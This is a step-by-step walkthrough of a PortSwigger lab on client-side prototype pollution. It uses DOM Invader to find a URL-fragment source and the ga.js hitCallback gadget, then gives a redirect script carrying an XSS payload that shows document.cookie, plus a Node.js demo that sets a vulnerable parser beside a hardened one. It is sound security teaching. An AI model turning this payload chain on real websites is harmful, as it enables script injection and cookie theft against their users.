Lab: Client side prototype pollution in third party libraries

After starting the lab, the store should look like the following image. It is important to use Burp Suite's built-in browser for this exercise, because DOM Invader is only available there.

We now enable DOM Invader in the browser. To do this, we click on the Burp Suite button next to the address bar.

A panel opens in which we move the toggle labelled DOM Invader is off to the right. Then we click on the Attack types field.

There we move the toggle next to Prototype pollution is off to the right. If you have used DOM Invader before, it may already be enabled; in that case the steps above are not necessary.

In the browser, we now press CTRL + SHIFT + I to open the browser's DevTools. In DevTools, switch to the DOM Invader tab and reload the page.

After the reload, DOM Invader has identified a prototype pollution vector: the page parses the URL fragment (the part after #) into object properties, which is why the payload used later in this lab is delivered in the hash.

You may need to reload the page several times before the prototype pollution vector is displayed.

Clicking on Stack Trace prints it to the Console tab, so we switch to the Console to inspect it there.

The links in the stack trace take us to the JavaScript file ga.js. You can work through this file if you want, but it has no comments and is very long. What matters for the exploit is the gadget in it: a property named hitCallback that the library reads from a configuration object and executes, so once that name is inherited from the polluted Object.prototype, our value runs. We return to the DOM Invader tab and click on the Exploit button.

A new tab opens with an XSS proof of concept that calls alert(1).

We now disable DOM Invader again (reverse the activation steps described above) and switch to the exploit server by clicking on the Go to exploit server button on the start page of the store.

On the exploit server, we scroll down to the Body section and enter the code for our exploit. It redirects the victim to the lab URL with the malicious fragment, which pollutes Object.prototype with a hitCallback property that ga.js then executes:

<script>
  location = "https://YOUR-LAB-ID.web-security-academy.net/#__proto__[hitCallback]=alert%28document.cookie%29";
</script>

Remember to replace YOUR-LAB-ID.web-security-academy.net with the hostname of your own lab instance. Note that the payload lives entirely in the URL fragment: the browser never sends it to the server, so it is processed only by the client-side JavaScript and does not appear in server-side logs. Now we test the exploit by clicking on the View exploit button.
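As an added example (not code from the lab, from PortSwigger or from ga.js), the following Node.js script models the two halves of the chain DOM Invader found: a deparam-style parser that turns the URL fragment into nested object properties without filtering the __proto__ key, and a gadget that reads hitCallback and hands it to a setTimeout-style scheduler. The function names and the parser itself are assumptions for illustration; the scheduler is injected so the script only records what a browser's setTimeout would evaluate. A hardened parser is shown beside the vulnerable one.

```javascript
"use strict";
// Added example, not part of the lab or of ga.js. It models the chain used in
// this lab: a parser of the URL fragment that lets the key "__proto__" walk
// onto Object.prototype, and a gadget that reads "hitCallback" and passes it
// to a setTimeout-like scheduler. parseHash, parseHashSafe, runHitCallback
// and demonstrate are names chosen for this example, not the ga.js API.

// Vulnerable setter: write a bracket-path key such as "a[b][c]" into target.
// For "__proto__[hitCallback]" the first step returns Object.prototype,
// because target.__proto__ is an inherited accessor, not a data property.
function setPath(target, key, value) {
  const parts = key.replace(/\]/g, "").split("[");
  let obj = target;
  for (let i = 0; i < parts.length - 1; i++) {
    const p = parts[i];
    if (typeof obj[p] !== "object" || obj[p] === null) obj[p] = {};
    obj = obj[p];
  }
  obj[parts[parts.length - 1]] = value;
  return true;
}

// Hardened setter: refuse the dangerous keys anywhere in the path and build
// the result from null-prototype objects, so no step can reach a prototype.
const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function setPathSafe(target, key, value) {
  const parts = key.replace(/\]/g, "").split("[");
  if (parts.some((p) => BLOCKED_KEYS.has(p))) return false; // drop the pair
  let obj = target;
  for (let i = 0; i < parts.length - 1; i++) {
    const p = parts[i];
    const own = Object.prototype.hasOwnProperty.call(obj, p);
    if (!own || typeof obj[p] !== "object" || obj[p] === null) {
      obj[p] = Object.create(null);
    }
    obj = obj[p];
  }
  obj[parts[parts.length - 1]] = value;
  return true;
}

// Split "#k1=v1&k2=v2" into decoded pairs and feed them to the given setter.
function parsePairs(hash, target, setter) {
  for (const pair of hash.replace(/^#/, "").split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const key = decodeURIComponent(eq < 0 ? pair : pair.slice(0, eq));
    const value = decodeURIComponent(eq < 0 ? "" : pair.slice(eq + 1));
    setter(target, key, value);
  }
  return target;
}

function parseHash(hash) { return parsePairs(hash, {}, setPath); }
function parseHashSafe(hash) { return parsePairs(hash, Object.create(null), setPathSafe); }

// Gadget, modelled on an analytics "hit callback": the code only checks that
// the property is truthy, so a polluted string reaches the scheduler. In a
// browser, setTimeout("alert(document.cookie)", 0) evaluates the string as
// code; here the scheduler is injected so we only record what would run.
function runHitCallback(config, scheduler) {
  const cb = config.hitCallback; // found on Object.prototype if polluted
  if (cb) {
    scheduler(cb, 0);
    return true;
  }
  return false;
}

// Constructed input: the exact fragment used by the lab's exploit.
const LAB_PAYLOAD = "#__proto__[hitCallback]=alert%28document.cookie%29";

// Run the payload through both parsers and report what the gadget would have
// executed; a fresh, unrelated {} is enough to trigger it after pollution.
function demonstrate(hash) {
  const executed = { vulnerable: null, hardened: null };
  try {
    parseHash(hash);
    runHitCallback({}, (code) => { executed.vulnerable = code; });
  } finally {
    delete Object.prototype.hitCallback; // clean up before the hardened run
  }
  parseHashSafe(hash);
  runHitCallback({}, (code) => { executed.hardened = code; });
  return executed;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demonstrate(LAB_PAYLOAD));
}
```

Running it with Node prints that the vulnerable parser lets "alert(document.cookie)" reach the gadget from an object that was never touched by the parser, while the hardened parser drops the pair entirely. The two fixes work together: the deny-list stops `__proto__`, `constructor` and `prototype` at any depth, and `Object.create(null)` removes the inherited `__proto__` accessor from every object the parser creates.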

A new tab opens in the browser and the alert() is shown again, this time with the contents of document.cookie.

We close the tab, switch back to the exploit server and click the Deliver exploit to victim button. The lab is now solved.
